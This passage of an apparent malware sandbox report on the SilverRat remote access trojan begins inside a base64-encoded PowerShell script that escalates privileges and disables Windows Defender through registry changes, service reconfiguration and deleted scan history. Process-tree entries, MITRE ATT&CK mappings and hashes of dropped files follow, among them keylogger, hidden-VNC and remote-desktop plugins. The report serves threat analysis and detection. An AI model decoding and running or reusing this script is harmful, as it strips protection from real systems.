AcABuAD0AWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AFAAcgBvAGMAZQBzAHMAZQBzAEIAeQBOAGEAbQBlACgAJABfACkAWwAwAF0AOwB9AH0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQAKACAAIAAkAFQAMgAuAGYAMgA9ADEAOwAkAFQAMgAuAGYAMwA9ADEAOwAkAFQAMgAuAGYANAA9ADEAOwAkAFQAMgAuAGYANgA9ACQAVAAxADsAJABUADMALgBmADEAPQAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsANABdACkAOwAkAFQANAAuAGYAMQA9ACQAVAAzADsAJABUADQALgBmADIAPQAkAEgARwAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABTAFoALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAVABbADIAXQApACkACgAgACAAJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFMAdAByAHUAYwB0AHUAcgBlAFQAbwBgAFAAdAByACIALABbAHQAeQBwAGUAWwBdAF0AKAAkAEQAWwAyAF0ALAAkAEoALAAnAGIAbwBvAGwAZQBhAG4AJwApACkALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAoACQAVAAyAC0AYQBzACAAJABEAFsAMgBdACkALAAkAFQANAAuAGYAMgAsACQAZgBhAGwAcwBlACkAKQA7ACQAdwBpAG4AZABvAHcAPQAwAHgAMABFADAAOAAwADYAMAAwAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawAKAH0ACgAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAAoAJwAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAnACwAJwBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAsACcAXABNAHAARQBuAGcAaQBuAGUAJwAsACcAXABTAHAAeQBuAGUAdAAnACwAJwBcAFIAZQBhAGwALQBUAGkAbQBlACAAUAByAG8AdABlAGMAdABpAG8AbgAnACAAfAAlACAAewBuAGkAIAAoACQAdwBkAHAAKwAkAF8AKQAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAfQAKAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAnACAARQBuAGEAYgBsAGUAUwBtAGEAcgB0AFMAYwByAGUAZQBuACAAMAAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAbgBlAHQAMQAgAHMAdABvAHAAIAB3AGkAbgBkAGUAZgBlAG4AZAAKAHMAYwAuAGUAeABlACAAYwBvAG4AZgBpAGcAIAB3AGkAbgBkAGUAZgBlAG4AZAAgAGQAZQBwAGUAbgBkAD0AIABSAHAAYwBTAHMALQBUAE8ARwBHAEwARQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKAHMAdABhAHIAdAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACsAJwBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAHAAQwBtAGQAUgB1AG4ALgBlAHgAZQAnACkAIAAtAEEAcgBnACAAJwAtAEQAaQBzAGEAYgBsAGUAUwBlAHIAdgBpAGMAZQAnACAALQB3AGkAbgAgADEACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABtAHAAZQBuAGcAaQBuAGUAZABiAC4AZABiACcAKQAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwACAAIAAgACAAIAAgACAAIAAgACAAIAAjACMAIABDAG8AbQBtAGUAbgB0AGUAZAAgAD0AIABrAGUAZQBwACAAcwBjAGEAbgAgAGgAaQBzAHQAbwByAHkACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKACcAQAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwADsAIABpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkACgAjAC0AXwAtACMA
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:560
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" qc windefend
    3⤵
    - Launches sc.exe
    PID:4872
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    3⤵
    PID:1060
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:816
- - C:\Windows\system32\net1.exe
    "C:\Windows\system32\net1.exe" start TrustedInstaller
    3⤵
    PID:5616
- - C:\Windows\system32\net1.exe
    "C:\Windows\system32\net1.exe" start lsass
    3⤵
    PID:1316

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES9789.tmp

Filesize
1KB

MD5
87c2ecc890921fde5dfb8f5052bbe974

SHA1
e030730d9e943210ce98835aa15c6f375b23ff15

SHA256
5562b14a688c64295eb02a11aa306a4998a571c07971de2feafbac4dc8b89b81

SHA512
f8b13199118c7825bcde4bc1eb8a12959b146e0acfb3e9e11f6aed7296b3b883c312a56883e30308f6117c20a407eb5af261b2f41b60d5df47fbb47fdbefb48b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC679.tmp

Filesize
1KB

MD5
a9657098ffc59324b4e9111c24c6981a

SHA1
34e5891fb10f566a29662efd82bbc449eb3cea17

SHA256
7aad526f66cfc499826d5f65252ae64965d4262f6a3f76bc44eb7aab3ba9bbfa

SHA512
e7f483c0d3a36cd99acbb0d14a7a6e5b01556b14f4df5ce87719f85be6eea0f8337c772893349655d10d0ec113c48f49707cfec042adf964300275d6b7c343bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE3B5.tmp

Filesize
1KB

MD5
527e801989707a82ea8b8b1b9b37035b

SHA1
18da95b4779c770c983d83ba592f168d808ed2f2

SHA256
a86ef5e9ca7d4faa86031f43fa84c87374056ae58b054a252d037ba33cf18ee8

SHA512
812c5a6cfec69350b8fb66277381f091e9ca3db25a047bb064511ebd97e85d6661315bf49e4baaf3c03bffecd1c8c2ccb8bb57326ff0c3cd6654ad0d4d0384e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tmp4608.tmp

Filesize
4KB

MD5
e1a48ec781542ab4f0d3a3368b2a1d05

SHA1
a35670f07e5320a1591a55d903b35dcdd1d224a1

SHA256
f41d8818774f3ec0bf936e564f50008b46f5e4060edaab3bd72ffa389fb9ef21

SHA512
d3e756d8b321d38962a7b36af617d152e9bfd499b31f1630a24ada435715ad81a29ab73e4ab4aa21bbc9029b4177a943303e7df922bf375c2583607cb6f6566a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_agajxrj1.tds.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\Bunifu.Licensing.dll

Filesize
1.3MB

MD5
c18a9e44e200c7315a1868caab894293

SHA1
18f65508762d2492f41b22e4e6e5ad19a2226baa

SHA256
661a5be944dc9fb2e0eba01c3c0584feb3ecca44877d77f54d0f409ce801af22

SHA512
9a5e08bb6ed4535ac92ca446b630b29587cb5a4d7d695234a5d93267d2ac13d702b3738ba0e20606f10020e9642e8e315e7ddc92f1c321b68daf8524a3f5f2d1

Download Submit
C:\Users\Admin\Desktop\Guna.UI2.dll

Filesize
1.4MB

MD5
acec68d05e0b9b6c34a24da530dc07b2

SHA1
015eb32aad6f5309296c3a88f0c5ab1ba451d41e

SHA256
bf72939922afa2cd17071f5170b4a82d05bceb1fc33ce29cdfbc68dbb97f0277

SHA512
d68d3ac62319178d3bc27a0f1e1762fc814a4da65156db90ae17284a99e5d9909e9e6348a4ff9ef0b92a46ba2033b838b75313307b46ab72dc0aab9641e4f700

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk.crypted

Filesize
2KB

MD5
0486cffaf3541884302f4ababa1b7c65

SHA1
0d6c065c36124685e187c3bcbdf002c0c8c28158

SHA256
3a313a2cb40eec47b1f859bd6c1ad6ab0b47cbc5cc30db1ff96208622758e0ea

SHA512
71f50d5bd6b5af6d8adb9627962fa87cf2a257ce0c562f58a220f4b63b5820568b02130e1c454a28b2cbdc46c406af920fc26868f04c9d5c515b7359b76b4eb0

Download Submit
C:\Users\Admin\Desktop\Plugins\Camera.dll

Filesize
52KB

MD5
e9e0b5fc7b1ed6f01d08d981d1cd761f

SHA1
011ac2fa1b9df6a4cb6d88c14316216bb64526bb

SHA256
2c82773466f72756d8152e4d5dc24d2ec954bfe5a6e7cae587d2e1d316ef43d0

SHA512
df75359dd9c1bcc6bccb17522186d710ae16054a496c3f75fa171dfe8f09e314fb28a7b1111193e64e37639c6d37de5c77cd99d795f72ab5338459886da6b964

Download Submit
C:\Users\Admin\Desktop\Plugins\Chat.dll

Filesize
36KB

MD5
736292dd81ad93bff84c28ce5de02385

SHA1
40d46e915d049966f023e8d8c1e059d9b6c22567

SHA256
0c83898f29762a4e3650fc5f5a8a3c3114d06da8f6a3fb2fa8b990a36716d6bd

SHA512
c126f17b9ed91994d52e61c7ab75536962a2c0f03cf90cba06fa423dd732379e7ccdf4050dada73267864feee8b677bd5c16ead8a485e3d8bd3f4bcc462015ed

Download Submit
C:\Users\Admin\Desktop\Plugins\HApps.dll

Filesize
30KB

MD5
a7c3b329ab9f4e20ed40c78b2ac36864

SHA1
fcb594e1a2a7c27e0208d413411e1ca30fdf4279

SHA256
d922c1762640f37a503eb116627a732290ae38b52f9b33437ffee608f7853a28

SHA512
870085fabe2ae4768b6ea9d2e7f13dad752f4c26ec6d61debd0b76c683771823b07338e1323e26c0c8e17f9ecf7f5d7fcd4b7d0b148501ef9e278b8b680925f9

Download Submit
C:\Users\Admin\Desktop\Plugins\HBrowser.dll

Filesize
22KB

MD5
ce1d9f8c498cd8c5ee38fa94df4b4907

SHA1
d3b811137776e4b1dc937d294ce0eff9a12594ff

SHA256
55b5efe0a09cb5cb79308874e2e5d25c895f995754bbf960ce9a403207ce3abd

SHA512
58c9e62bc32376773a9bb1f266aab617ad2098f2d12b13fba1bfcefdf3edd1f44682c791567cc67035550b80b735ae460111145fd1b9d733325cda9dfbe61849

Download Submit
C:\Users\Admin\Desktop\Plugins\HRDP.dll

Filesize
16KB

MD5
b9c9ea357d04731bda8c8393ae5cd741

SHA1
8d462aafddd5f37513226523dd4b7a354be2f492

SHA256
a475f59f6a1b6b1fb4c6e78f1fbe7df2d38c4f743488ba7da128a5771bf6de86

SHA512
1876e27c5d224d4bac403f99bfff21cbdd35e3d4d91257ff7c2482552e9925d85c69eb092e590ca48251e8fbf19372c131d191caa0e2b8977a2ced36173515e2

Download Submit
C:\Users\Admin\Desktop\Plugins\HVNC.dll

Filesize
31KB

MD5
3d07031e76978680240e80cc54451ad4

SHA1
255f32852fa97990ce16c8bdae766c79c7bcfe56

SHA256
44cb17f3b048ba2c7653409b0dec7c94eb86d2cf0322ac79ce6764d5b8df1549

SHA512
3595793d4b8e197a60d9c28060415489592da44e20e8f999d91e4c2f164e43ee00aaf94216a0daf4ade1cab8577dd34bb8e02c7ba12b3757b2c82c4e4bb91c7a

Download Submit
C:\Users\Admin\Desktop\Plugins\Keylogger.dll

Filesize
13KB

MD5
8e2d761ccea68168d0b991b475155678

SHA1
2872d722bdaf496d520e643d114e712199ef00f1

SHA256
c3fd1d11641109c9033fa20af16c6b737008c137fd8a926bf0b4c6630d8ab9ac

SHA512
e179a1da9f2d00cd74352dc81305462dc928a6e2acace665d42e8a2d0999bc6c8669e5e290ebd17064c6166604f87de2c7e7f31b42b4ea82b23738792c68f68d

Download Submit
C:\Users\Admin\Desktop\Plugins\Manager.dll

Filesize
126KB

MD5
b17ddbfdf27aaedb6e26ed70783a6ae7

SHA1
08590ed55d9adc47c53a9dcf7dfafc60b877aa13

SHA256
da8c5ffb5d268e9aa5783bcb064502df8f78cba724a0f96793795fe97e62a6e1

SHA512
0079131280257413f43a01a0de2b3cf393745d2864ab521619888b3b25f7f0ec1f32f9d6f682250b73c92c1483d841f7ca3f8bf34e785e3fc93afae6d086693e

Download Submit
C:\Users\Admin\Desktop\Profiles\Builder.xml

Filesize
1KB

MD5
3fcd4ac4720febae7ed0b81913daaf1c

SHA1
7d2ec4090023cc93a453c65782c78fe9bcf5afbd

SHA256
b4b7d0f7878a60e5d641443a7d4720e178568e6febbb38a243d3b9fb8a30842b

SHA512
c6a5c5c5d17d2e56fd2fde8705062a8916673ec5557ef9f30c9f62c67877c72f5b8e4528a3a8a8ec24f74e5c52ed385442483606b13972bcc645257a5826f2ca

Download Submit
C:\Users\Admin\Desktop\Profiles\Builder.xml

Filesize
1KB

MD5
0eee6d94fff47a879efc0d110384f364

SHA1
246d1f7884888558d9517d5df4e1dfcb96d9ea1b

SHA256
92854bf12ed798a166407c5544661991ede35b2aa6ed1c6470d6654880b59e00

SHA512
0feec4301953d7eb183f090438cbe6710d1592f5a749fea63574e7c7b71ca357b209a77fe977cd0fdc9b1c56dea94f119cbcf3ba731fc9c5d18a8bfa536f0cdd

Download Submit
C:\Users\Admin\Desktop\Profiles\SocketPort.xml

Filesize
57B

MD5
5f807862258a390b2e2f75abb6d2c865

SHA1
22abc144aa034c6490cbf143a8f1cdd42bd06d1b

SHA256
7b87c31f6d1163fc236651f5e1f3187cfa0c79d4a85d20c1c05f1dc3056c4823

SHA512
b831e4b2eeec23e39544961cef6619c8d57c50b53dc6bad8846682df6f5252041f50ce33cbe182488288d6d5e2e3e5194055ee4143ceb09f9601ed49d39dba39

Download Submit
C:\Users\Admin\Desktop\Resources\FfAATLCRNqJGAfs

Filesize
37KB

MD5
8680c5baeedce6f37a962f7289ba27ab

SHA1
ecd6da646e8ccc901c20f398d1470251ab5051f0

SHA256
eafdc0e3101b53b489308bdb276379dead69ac4b106b9be68b765ea9bd9a52a3

SHA512
8276f038952860e44ac79094a6246ef2e9472a9422d35b7d4c82ee497d0ff625c2d4cf5d1feeb967e077149b6d1eb802538508479634745038de8bf94d3503df

Download Submit
C:\Users\Admin\Desktop\SilverClient.exe

Filesize
37KB

MD5
e99dd9300388685516f08af61234506f

SHA1
9b9d2a7bd7f868dab10ce68153716c168a97e5f4

SHA256
7e58d5deffd991a273f685ef23d500863a803619c9f357e4eee8ca7a092cd823

SHA512
c2a2ac806fbcd269891077e17a488945e5f7d5c2b4cab670d5d9e00e72148cfb65cfd5dcfb4a1aac2051d4fd5adb84702e9c2e867252815f752c3b1f07f81c47

Download Submit
C:\Users\Admin\Desktop\SilverRat.exe

Filesize
25.2MB

MD5
d6527f7d5f5152c3f5fff6786e5c1606

SHA1
e8da82b4a3d2b6bee04236162e5e46e636310ec6

SHA256
79a4605d24d32f992d8e144202e980bb6b52bf8c9925b1498a1da59e50ac51f9

SHA512
2b4eb9e66028d263c52b3da42fa3df256cf49cd7a7ebdf7c75da6a2dedfd2c22cb5f2071345b7016cd742539c74a801cad70c612330be79802fa19f860ea2d5f

Download Submit
C:\Users\Admin\Desktop\SilverRat.exe.config

Filesize
526B

MD5
d6f1152d647b57f64494c3e1d32ede94

SHA1
a35bd77be82c79a034660df07270467ee109f5ac

SHA256
a47f3f83cdb9816f03632833dc361ac5e7a4c5c923af1fdebfa16303f9d68a72

SHA512
699b5ad93d3497348f8aad8e15d54ddd789bbac43f11a7fb629f19cda3749bee0ae06dc83f4e6246df631488169fda5d15c48585581d3a96d2523b8b45e639bd

Download Submit
C:\Users\Admin\Desktop\System.Buffers.dll

Filesize
20KB

MD5
ecdfe8ede869d2ccc6bf99981ea96400

SHA1
2f410a0396bc148ed533ad49b6415fb58dd4d641

SHA256
accccfbe45d9f08ffeed9916e37b33e98c65be012cfff6e7fa7b67210ce1fefb

SHA512
5fc7fee5c25cb2eee19737068968e00a00961c257271b420f594e5a0da0559502d04ee6ba2d8d2aad77f3769622f6743a5ee8dae23f8f993f33fb09ed8db2741

Download Submit
C:\Users\Admin\Desktop\System.Collections.Immutable.dll

Filesize
175KB

MD5
8f55c22412f7d448d6e7b83102665368

SHA1
88df86ee0b137992af15a35825804274fa252e30

SHA256
67730917b4e856e37a9d78245527584087fac6b20a7377677b2f444cd15db918

SHA512
058431aa2280511b00a72ea55ded9bdaef55420f5bce10c9352d4f92736a11884d1e70706016b988cca560358b3b43ce1bad5c9bd726f11d8ad66e3c91f98ccb

Download Submit
C:\Users\Admin\Desktop\System.Memory.dll

Filesize
138KB

MD5
f09441a1ee47fb3e6571a3a448e05baf

SHA1
3c5c5df5f8f8db3f0a35c5ed8d357313a54e3cde

SHA256
bf3fb84664f4097f1a8a9bc71a51dcf8cf1a905d4080a4d290da1730866e856f

SHA512
0199ae0633bccfeaefbb5aed20832a4379c7ad73461d41a9da3d6dc044093cc319670e67c4efbf830308cbd9a48fb40d4a6c7e472dcc42eb745c6ba813e8e7c6

Download Submit
C:\Users\Admin\Desktop\bunifu.ui.winforms.1.5.3.dll

Filesize
297KB

MD5
c1d51a0e747c9d6156410cb3c5b97a60

SHA1
86312cba2eb3495cc6bec66d54d4ab88596275d8

SHA256
6937052b86bc251be510b110e08fc5089d3bd687ce2333a85ea6d5c2c09b437a

SHA512
a8d7b2e5555c01076e8dd744d21d8cd901aaffad052af0e8c22269e8c2f765019422ed245368a64d64157652a0e4fcab1a889086fde4e139b4ccf5f7bad08222

Download Submit
C:\Users\Admin\Desktop\bunifu.ui.winforms.dll

Filesize
1.3MB

MD5
686833fccd95b4f5c8d7695a2d45955d

SHA1
882f60ea47f536c1f01da0f5767dfe5d569fc011

SHA256
578cbcfb7a01234907fb6314918efd23a502882c79d0ee3c2e7d4ae0cf63ebc2

SHA512
8bb3a8741b73ad7c280de31905dbfc449c2d6f538b8feca232201c7079f917c4291936211632bcdf17c95d6cf5d9b97df2cdd21c57af6cbff486ea7691ff3bc1

Download Submit
C:\Users\Admin\Desktop\cgeoip.dll

Filesize
2.3MB

MD5
6d6e172e7965d1250a4a6f8a0513aa9f

SHA1
b0fd4f64e837f48682874251c93258ee2cbcad2b

SHA256
d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0

SHA512
35daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155

Download Submit
C:\Users\Admin\Desktop\protobuf-net.Core.dll

Filesize
263KB

MD5
7d5a891689dc097d641272a459da8ac8

SHA1
a5b6efdd77bb8dacafb4b3013ab81919ad0e407e

SHA256
8c80999a13b87b0449ce09ebb7d53344b5771876e5af2e426c8e80258f62dff1

SHA512
a618ddfd22fc1ead717c2d0ca98c98d81ac4888f4af0c5952c1404f1c36e8ea4796f57bbd026aef187b9575a8737bf02ec7d5c58079bb89678b09239f4f932a7

Download Submit
C:\Users\Admin\Desktop\protobuf-net.dll

Filesize
251KB

MD5
02de5f3f2a4b2e15ab53212bc93dc2db

SHA1
e71e402ab28cd47d55eb997ad0e55ef1ac29d533

SHA256
c814d207eba7589cbb810b1625ac4091a5cb5cdc9be5e6691bddb2c4dde4619d

SHA512
7b1f09cdae30c2f1577a694c6ddbed6446997788f42167b4bb78f59c46154b43405639f0c9de7bc57aac598920fd4767cbfcc5ca01f803599d53820c3da4dcc1

Download Submit
C:\Users\Admin\Desktop\stub.cs

Filesize
84KB

MD5
255787b7316051d866d8a8a384102c9a

SHA1
5a9fe0570579b7fe3916ec51abaa6606cf44dd18

SHA256
1ffef5d31a2d6dbc01177fcf7835c9d9eeb4334bd39b20ec76eb2be1ba429f3f

SHA512
3016709d0ca83b58abadf1db647ff313105fa03e738f016cbb6364fa258c1824bfb692117ce325b1189a73242208fbcb58825c0abc022df06b771ed0937594db

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\a05ekvgg\a05ekvgg.0.cs

Filesize
87KB

MD5
6cf34a759c8e94f30442fcfd8c91aead

SHA1
d1c5333dca12df24cec299342db85475621cf94b

SHA256
c68ededd9f3630245591daa05c0ec84a898082f5f29d38297bb311ca8d6320b8

SHA512
92c6003dd20abdf70959c469b61c125363e726cac9353553a629b0b42443ba98f6e6d0d06ccfeb06221f3c9066ace37147a493ec0bafa232c69973de7bb9c3e6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\a05ekvgg\a05ekvgg.cmdline

Filesize
265B

MD5
ecc5a16ada420209007167a972729113

SHA1
377c3f74069c6bca71ebbbb3a5a12c2103ec70d2

SHA256
0d44a52de74524bbc770b3a9aae31964994c0a38d080d08f5a7f71180ba316f6

SHA512
8388465067a283a703f526f089735e07e2f7eda536016f47902aa80e54b18d56ecf3c701f25ef03836adee34f629f7f384d2b77ced67f5240932b3e3077090c1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bwoqv03i\bwoqv03i.0.cs

Filesize
87KB

MD5
10f374bddfbd1b97dcb52ef117987f52

SHA1
3ad00686f01edb59fed7136fb6a3a1aea75b7b6f

SHA256
4d4eba74bd6164a63fe1882664e8140967828a62b6f9a2941fe067c91d650a34

SHA512
b9831810d3296af7e0c9df4c6de57f64b48b74aa367ddc61429561ab94d58b4c742734b7006734f10e3d7f61a3d17c281efcc755e1c42e726ad3cbd9d53176ce

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bwoqv03i\bwoqv03i.cmdline

Filesize
274B

MD5
a9555e267e67dfca86d8cf75f233e785

SHA1
aef4d9f553efec42ac85aa83b53869c4f4f88f94

SHA256
f6fcdcf0082248cbc410b630b72259456a5a85e03559d15a6e73c6ff58d75323

SHA512
acd1efc01fcd993a13ad56cbbb4476804fa9a947f1284a31d08f3b80cb7a49537d1cf8f90febe693e5cb301de2df3336e1ab7ceb9f1dc88f879c89fcea874a45

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fyrutnv5\fyrutnv5.0.cs

Filesize
87KB

MD5
526f5a31791b6862ca2b70a7ee8f765e

SHA1
e47695333bc9e2afe2fddc0a5beb3d7424e00d1f

SHA256
e3f24afb73d8bda90bd055e4ae76cf101e2def4a998243dc6768b80f5791848d

SHA512
efbde8e94bb253ffa2810584bc57b00cae3dbbca434701ad6ac1de549d79a257a4da3d61b82a50afd45553008cdfd4d7cabb310b6f406bdca01c3345efc03f05

Download Submit
